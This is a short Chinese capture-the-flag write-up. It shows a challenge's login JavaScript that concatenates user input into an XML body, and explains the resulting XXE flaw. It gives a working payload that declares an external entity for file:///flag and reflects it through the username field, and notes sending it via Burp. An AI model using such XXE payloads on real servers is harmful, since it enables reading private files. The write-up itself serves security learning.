题目源代码
function doLogin(){
var username = $("#username").val();
var password = $("#password").val();
if(username == "" || password == ""){
alert("Please enter the username and password!");
return;
}
var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
$.ajax({
type: "POST",
url: "doLogin.php",
contentType: "application/xml;charset=utf-8",
data: data,
dataType: "xml",
anysc: false,
success: function (result) {
var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
if(code == "0"){
$(".msg").text(msg + " login fail!");
}else if(code == "1"){
$(".msg").text(msg + " login success!");
}else{
$(".msg").text("error:" + msg);
}
},
error: function (XMLHttpRequest,textStatus,errorThrown) {
$(".msg").text(errorThrown + ':' + textStatus);
}
});
}
漏洞点:
var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 可以自己构造xml语句填进去,导致xml注入,而且在TIPS中会显示(用户名)登录错误
会回显用户名,以用户名作为回显位,回显flag
构造payload,这样登录错误就会在<msg>里面显示用户名,但是用户名引用了XML外部实体,所以会显示file:///flag的内容
<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">]>定义外部实体的名字以及地址
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
<username>
&xxe; //注意这里有 ;
</username>
<password>111</password></user>
一开始笨了吧唧的光在输入框里构造payload了,完全忘了还可以bp抓包,把<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">]>放到前面去,任意修改位置